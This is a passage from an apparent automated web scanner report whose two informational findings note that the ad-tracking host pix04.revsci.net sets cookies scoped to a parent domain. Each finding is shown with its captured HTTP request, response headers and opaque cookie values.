q41YR433M2skqZB7Bscl4IeGnZ58uYN3pd79XDsOgUGGHEKgc+7Yhj3b17xVZX/G3DAFa1giQX7umJFljvBjliOhohn4BP5D3Lbe5u1/EMfom/qiH9of7vAudveq4lfPlJzDXu+DiQwwzHEv+wUPaxw3GKnLhQEwB1xC3yrWl+Har/mizye4bMAK/OltQjqwZwXf+c3piPfyL9HQI4A7FO7oqBogV6RjXrWd01tXkImPIoNEpLJAiSPu2pB46enweqy14lHKPZGsIym+R6HQlUjfavq6gnUJBcMia1xyh+Zy4xZRKusml6dTh8bzt4R4nLkQdezQznbxlZp3OWNZkqQr5ydTWnGaC1cwsbTejBW+CVaecy++r7fTaCJtToBYKhFcxxezelaaiUNZyOW2QQoVc2ogojiCIyXUaWT4FNN661g8F+vgiAP+K8V6mVKNJ3FdgrF9mlrS7re+j7yXetVD9Q2Ry72GcM5tsaHTqVwo18Yip0oSC5To+ZEocbOpRFdPAo8rHDAxAXlXclUC3bYUNiIrovxdnOVYTq0T3uf2R5dXcfp+IieM52iJDxoPG3UwTmpnbAYeTT2nWH/zSYm6U99jP998YOATEZLOuL6NzUBFHWgIA4vsnEZwQvaS7cwiU+CespVsvbOnjpp5nqxOpPl4Z4AvgupTTxJjODj93XgmPGQ4osTLZ306yZX/MFih8NzXOhPWyzp7iyrrUCFAFXgPJ4cfHMeFOwP+gkNQ0mGvMxraeDAtUytk45JzPMAUho4A2F7yd0D9GjriJcmjLUQ0wFuDw95rrQhgOufWkmyNX5UsBxI17yfsPFgf8nJSDkP2pyGWoTtHmGJNOtU/bvW+ojwJfL2ezmtW5npyyPostAyx6IHhzkNbQmHtA+Uf43Gh7/ET6/+mSBrJr6M+VT6XvuhTAPCsg=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMnUxjaMX8dB4bLdEzXH0BzkgrzQId4fZPYynL092BGNmJfu3ZKbDYVWgROkpogd5m2UVZhuiFqnW41Y23J+N639Yk0FAXcAE73YN7Dql57uFYGqtbyoEYwmQ3qLbPZNP4YaLCsBTx+G71IdHayTwUxZXRxphSE7z0Oh+32W1M/mAvayqLMqWypL5ig0WyH8hIkdW0poHw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EmhOXMQT7uItGF29/yo/tk8g7ZPQl+KT2sir9n5vw/ZUuJEqMB5SuHqPlIcMQ/wuGtIXDFi7gHtANUTDlM7WrYc77BvNkkm74YZr8vsOzTjWu1IMaklfrCIvnqjtBazo57KAavAGCJWMeY7+nWQvQPde28mCn8HVj3wn/LteM4fXqdP4oPyTwkuJUiBNLlwyKp1uPd5XVWarPuN9DSmpqdU4I3hB7P2eDvpimyKAvlNhKtgXGmh1fNzUoL4L0qR8Xev7sNOxpR8TSJvfdASryikRKuIoV0pjLiqzEC1DsFT+Q03yVLUiSLNxx9TAzykG9l+BdQSqPmBBY8gWAHs5T+Z13QbK7ZUBU0KP7gq6C6QZabQ+rvxFb2rH3na9vVIFbioRxyqw+0AKCF3TCDwjoxqYNq3VBnZgtZoSK4iN8fzUSwLvbl4vGB24IZl41PfE4CbO7AMULxN88ioWVIDRzO+Ze/xcH3C46oyYxPJ+Rd6m33NVOj7vqpyfyQt1UUcFhDJ25JsjzaLaFAl8uGNuMal0lzdhOVSJXxNN+bF8NI8ER6MvpozFI5xB3c3MQ2j06MLFF2iH3yy2K4flU8hwz7GxuYksxHzRPwya+5JxxiMFGcTphU5Tgkbwiw8s3afVem+k70CyER2yK2zXjhO; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:49:04 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:49:04 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.177. http://pix04.revsci.net/I10985/b3/0/3/1008211/677906397.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/677906397.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyRNxTMIyexPBnJTV8/3oC+TvABd95CD+ezofd4Bl1AlsaiOHp0geQducKlGfwpIOEBVo+GFwzeQN68obRNXALJBx3ZXWuVggM4xbwSYQwnhWWSGdh6qfSwPCfca7qT56dXHeSsV+R5VPp1govFhJJmNG+iFwpwaiKvYsTVErhovtcidI167GCwebR2BAz1y7hMfW0VodNBEt+pfLsa64tp8Wq8jPtl9ruFZ261m40X8QzfUzCGSWw992aSysyqxCtbK580lhNC5v3W2hXSP7VLNATBq+mR9LHb0MUwGA775Sahwg8SpOmUN8MQxOcqP03; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:06:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/677906397.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_v7Tj="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9NPmW+Qk/VjEpNZvXbTc7xC8rSTKo6YlNBzeUPscljoPMhFn371MBxbkm+1zMtu7BdpFD0dQvdMZEVVUuNKUlMx7ekfnlMTVanFw84KgBQC9I2P+pzHq7AtUd7iRRhRSP/5/7N2u2BlCRlCYHiCgVFYZCBryJ26mT5AZCyLIcSqMQGcTvM9cDrGHfr36wyAK9wA5FRqjBUFsjXMgeGPMkqW64yJRr7SSKvfEvA497LO6E5Dxa9alQlBqVc2JYmuRljD4rpsFPJ75cGMRausUYjRFjn/w3s83ifUh9mpNJVjJLOWlI6C+mgBfQ/UW5pccKdYaeTK/Zh0FOeLhWhg7xK1SWdQ1SmVN1CZfU+GHKBkbqwNA3WpzgGbkt1kIjXM1V06PT/RP3YRaMQXYbmosGeQncC20aHbJVSL29fPb8WwCj7ENYo4X55FyEUKJcEVwc4TPhdeQs2qklfVTF2/8v17NmJrSGTWPFKnVsHIenTSrtr3UBuP9FqWGYCfkk1IeXX4Q9FQ82k3NHz6hKijJSw1U9yCkUkWV4bw9PuIyYRXQaFrUavNooiWB2FIVgoWiz5Nqt+Fa8tPUGgFoUIhs3xXxM8KCV9XE9AS9pGrzRbFUQrEq/nZ8/KbrPgGcQhkePNVP2tu5pVhZvv0SYqXAdieR4tU/XufUfe6xoVMVUjiGNWrDuSid9Zt5uOXOHt+B1Yt3YDD3LvtttmwQT+Wby/Tw3znPV5msQkgJ131XEqvGesi6MJG8TORqy7EqDLsI6kmj02K5rVBqQRoMP9KeTgKL9/tvLAJHwo2ZDPtMF6EIGNFPap4eyDXTop1qiEYgylsf3tT2rBIfrRiM5TSQG5wmqzASPlSN7ZmTp3I1ILTcvLbihbPwaO2XpK+u2M9gNt7+ZD+CH8cxdFNcOj1vBNwIgCeoPJpOspVl0CMrmLotWoimO4K1/wn7bLggNBYJTnAiDK8L/BObQma70vFGmb/kDntYL9pDswbM3WsmCJ78wYThi6pVH4CACoFkuyEvLDDr2RztXQLVbT0M7xPQMVFy2QnpS8c4hiaE49UtEC7GAzcMTsZEZ2zUHjdrID5ghuzN2YuT8M9Y2YVofWphgVc2QpcHEBoZsQzPXc9Z5g69lPMO2OIcgNn8kFxmFmkTs+kXAEQ6ugtELD2NlbTaPOwp7n0Nh4XC9DR0nRBNwvxh0q9X5d/xIGTAlMWc1+uxRdzS9BCG8RDIugUlQ3dSKfJwDtDTH3wiug51ZBAdWv6BqCTcPRRh1aPawqO/B+fBFviI9gB83QEl5ac0Nrm5dSZfbl9BkHLZmprMriMqxnQr0AD2SbpF9w3A="; rsi_us_1000000="pUM14y+jOBYULQE0ur/Thhu0D2LK/OWnjvo88q/k8TGDoK1ZqXQD+bEm3drz/lAH4PpnZegZFthR3M9UjCPq/WGfYUV3ECFN3pSpL8cGgBFDqkHe/o52XtD75xYzoLQQGybgIYlCNiFpufKeCQahSwYDT1hDfGyvC2mAs/Cp/hgYIUj3MEcHiWA8lw478Kl36sxjKUYp9QU0u5fnCbqsklGPjEOh6F2RM0ckGbIqWoDaf8EHMYcS6OJBJE4nJT/4BHOB+u7uvZ/I85tTSGSDBJPwU1wfPITuVsqH9GWNS3tJ/5mQp9am8Y4JC5WvvJHLsD7ltN1C8pHL8pu0v4hwhjgzQ7luOTSmnMohp+pRDKRQxKUephRDSwVAOdldOz8TNwS0kqLPb2HiZoFb03JeX1V5blv6m7+KEp96Zsc7E1r+iBfhQII/WHa3f2T3OK76BWAEbT7XlBYx0xUcZn7taBIV0Crw+kSkT2X6zDcyUUq9bB5pJ2tSngdi8sdK92cDN8ZqT+nM+RS+duuY9mQ99z2DcdAD8pBuZ8Tth2r0rIgrb4K8Sd9LofXlhJf47EfyqW445rzKjYyh0CwinsnzQD5VggBsvwqCHTQsLtXECT8bydygdTbBRu7mi8qd7Su1yT8Rn98TkzVWhutbFEoMqPQx+3LTPHvRftp8ndqo6ztchixL2XgtWd7zlXCA8Mm0+4+1G/ZAkFRox24pcao9cZ554id6MQ2E1C3TyXi7WCGQ01eweS3Ow7C8PmhawvesLXE22mcgENA2FV0QjTL0g9h6LvR7WZyGnVWdMdG74vyi/pT+lLyJfM/22BzF3GeK6BqwBtNtOJsRHGbBFWqgUzaKrPhUjrVzmhPDwmb41HyzqCtUm2jdevDY0p1/evcbfpHJthVtMNrhSK6qmR+/BRTQekg7NIXLiBohr2JMxFXMAfIBTSCNvKpr55iq8ZT+30epebNVVy20OVMn5/oWmFF9s8uzrbdtFBaodMoUuvQ2/eQDQrWDZBo5/UKloin/6E7+hyurMSZANo6UrQmyhfQqO6AbDGeniaDwpZlDBBU00zwWaBuhhZJAWBzhyhPAWcETHbbiKAcNcvWDajVX/AQSphUj1vDIXYvWJfDCsflebM7Cogci6vYwFDFW6qWOfgPIpQLuL6+7Wm7PqgcmnJGmMDOZd/lyTbRpGveoHOqicFrRerM7RLby8CjYjp5xWhLSkLvuasr+a48DAf/MmhS7mvbOziUKwj6W4ZTxbXV+syCKWGMCjNCV1eG0UL/BCBsIxV0GgynbtamJ5R3wJxyjmsInTWF7RPsbW6jq9uF0AWCmLZZQaj+C38PLC2UvGbMD4fe7y44zAxGweQewT9CtUYK0sbFcYAUkPfyVs9AiE1jgSJ9D8428THYo8ZWDfjjTm0VgTF30Q6+isvgeVaUhqti+sJcZZn/4PYbm0+nstnYnjnLIxOn98tvLXknQ/nR19CtYlibliAnYkhrafEGLcO2BUqau8wYIyE0ciGG1Kk6gTSl8cRlLBRbZDCyPJIxBBfovlaeR0THs+wofPI1XgQ3QXiaCsv9xwb629vVkK0I+Ke16XI1lmrwsXAixYV7IL+DyDbFv7W3zZVFcFYVfzk1NQqsq7GPaCQ9++XJ7uddCtnEGAN4e9HanBHzaB9beiNoQvzawxh157XzTdLY28rwmyJE4ffh/ymZ7dECghNkcLAlqam/KUto738nP/wRHt4yRiNPTSJ18W6zuemGwf3WD44ujAcs9tiXLS4w8waztiol6YiT22y9Av4ze5fc="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JI/NX8i6KeSJw0mtMH2weQSGYPTNWz9C1DH9tRfjw4t7jgY8E1Syo1RXJ3j/iiKhEBH6CcFOAsZTHyGci6z08ra07WZZuavu0gC4rxNnZ3nu/7w3rzBduHuYcjb1soyILRWKIS+7LyZ7TmE7e99bDIS7fGQBwxkT6ha/MJfg6WACWnPOCvVQcLLS25O2Rfo4owNM8=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyRNxTMIyexPBnJTV8/3oC+TvABd95CD+ezofd4Bl1AlsaiOHp0geQducKlGfwpIOEBVo+GFwzeQN68obRNXALJBx3ZXWuVggM4xbwSYQwnhWWSGdh6qfSwPCfca7qT56dXHeSsV+R5VPp1govFhJJmNG+iFwpwaiKvYsTVErhovtcidI167GCwebR2BAz1y7hMfW0VodNBEt+pfLsa64tp8Wq8jPtl9ruFZ261m40X8QzfUzCGSWw992aSysyqxCtbK580lhNC5v3W2hXSP7VLNATBq+mR9LHb0MUwGA775Sahwg8SpOmUN8MQxOcqP03; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:06:41 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:06:41 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.178. http://pix04.revsci.net/I10985/b3/0/3/1008211/678221040.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/678221040.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAIEl+MaMcJSum2NZ+VEqMB7SuDqPkIcMw9wvTUz/xw+ppzybIZwKwWgY0UUnQiG5kFQmZouI+2ZBSjkw/QKBeEE1wCXGDbX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trGzWnlOqoD+91j7fcB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGRBe8iihXakPzZvmfKPy95K8ih9mXMMCtdrIvcMnFligtQN54cgzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU86AmxfH0WcSpYG/n1/A45enPmYXILcczr1Ob5LQAcyOcRgvCViQb7zYFshfEnFZbda/3YGUcrFK9Xi3pG7800xiuwYalL797YznATh2rdj1dKDgZGk4Jbi2sFQBKisvVDTNlX8HJRUaqJAIuoclVNyoFehm83fWnbz95BIraDDpoJqjc7iSIE12hbXKRDsV5A1T0NNU=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:07:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/678221040.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
